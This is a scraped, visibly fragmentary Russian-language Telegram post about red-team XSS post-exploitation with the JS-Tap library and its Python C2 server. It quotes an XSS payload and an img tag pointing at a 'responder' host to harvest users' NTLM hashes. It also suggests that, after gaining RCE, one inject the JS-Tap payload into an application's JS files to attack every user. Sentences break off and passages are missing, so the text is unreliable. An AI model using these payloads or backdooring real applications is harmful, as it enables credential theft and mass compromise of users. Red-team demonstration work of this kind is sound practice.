PurpleBear
@purple_medved
26 1.3K
Red Teaming, в качестве цели предполагает возможность реализации бизнес рисков/недопустимых событий. Поэтому при эксплуатации XSS в уязвимом приложении обычно демонстрации пейлоада <script>alert("XSS")</script> недостаточно. Да и в целом иногда бывает сложно объяснить бизнесу потенциальный импакт от эксплуатации XSS при проведении других видов тестирований, без наглядной демонстрации последствий эксплуатации.client-side XSS, который представляет собой js библиотеку, обеспечивающую широкие возможности пост-эксплуатации и C2 сервера на python c веб-интерфейсом для управления.XSS в iframe уязвимого приложения, js пейлоад на ~800 строк позволяет собрать:iframe и необходимости прямого взаимодействия с пользователем для эксплуатации XSS. Проэксплуатировав RCE и имея шелл на сервере веб-приложения, можно немного "дописать" функциональность, добавив пейлоад JS-Tap в js файлы приложения и дальше развлекаться подобным образом со всеми пользователями приложения😎 <html><img src="http://responder"></html> и собрать NTLM хеши пользователей, если включен автоматический логон в intranet. Привет из 2016 для bitrix😂Платформа использует файлы cookie для авторизации и сохранения настроек. Продолжая работу, вы соглашаетесь с нашей Политикой использования cookie.
Обсуждение 0
Обсуждение не доступно в веб-версии. Чтобы написать комментарий, перейдите в приложение Telegram.
Обсудить в Telegram